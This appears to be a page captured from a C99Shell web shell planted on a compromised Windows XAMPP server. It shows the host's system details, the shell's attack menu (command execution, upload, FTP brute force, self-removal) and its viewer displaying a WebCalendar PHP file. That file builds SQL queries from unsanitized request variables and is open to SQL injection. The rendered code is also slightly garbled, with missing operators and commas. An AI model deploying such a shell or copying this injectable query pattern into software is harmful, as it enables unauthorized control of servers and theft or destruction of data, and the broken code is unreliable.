!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\WebCalendar-1.0.2\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     group_edit_handler.php (2.16 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once 'includes/init.php';

if ( ! 
$is_admin ) {
  
$error "You are not authorized";
} else  {
  if ( 
$action == "Delete" || $action == translate ("Delete") ) {
    
// delete this group
    
dbi_query "DELETE FROM webcal_group WHERE cal_group_id = $id " );
    
dbi_query "DELETE FROM webcal_group_user WHERE cal_group_id = $id " );
  } else {
    
$date date "Ymd" );
    if ( empty ( 
$groupname ) ) {
      
$error translate("You must specify a group name");
    }
    else if ( ! empty ( 
$id ) ) {
      
# update
      
if ( ! dbi_query "UPDATE webcal_group SET cal_name = " .
        
"'$groupname', cal_last_update = $date " .
        
"WHERE cal_group_id = $id) ) {
        
$error translate ("Database error") . ": " dbi_error();
      }
    } else {
      
# new... get new id first
      
$res dbi_query "SELECT MAX(cal_group_id) FROM webcal_group" );
      if ( 
$res ) {
        
$row dbi_fetch_row $res );
        
$id $row[0];
        
$id++;
        
dbi_free_result $res );
        
$sql "INSERT INTO webcal_group " .
          
"( cal_group_id, cal_owner, cal_name, cal_last_update ) VALUES ( " .
          
"$id, '$login', '$groupname', $date )";
        if ( ! 
dbi_query $sql ) ) {
          
$error translate ("Database error") . ": " dbi_error();
        }
      } else {
        
$error translate ("Database error") . ": " dbi_error();
      }
    }
  
    
# update user list
    
if ( $error == "" &&  ! empty ( $users ) ) {
      
dbi_query "DELETE FROM webcal_group_user WHERE cal_group_id = $id);
      for ( 
$i 0$i count $users ); $i++ ) {
        
dbi_query "INSERT INTO webcal_group_user ( cal_group_id, cal_login ) " .
          
"VALUES ( $id, '$users[$i]' )" );
      }
    }
  }
}

if ( ! empty ( 
$error ) ) {
  
print_header''''''true );

?>
<h2><?php etranslate("Error")?></h2>

<blockquote>
<?php

echo $error;
//if ( $sql != "" )
//  echo "<br /><br /><strong>SQL:</strong> $sql";
//
?>
</blockquote>
</body>
</html>
<?php } else if ( empty ( $error ) ) {
?><html><head></head><body onload="alert('<?php etranslate("Changes successfully saved");?>'); window.parent.location.href='users.php';">
</body></html>
<?php ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--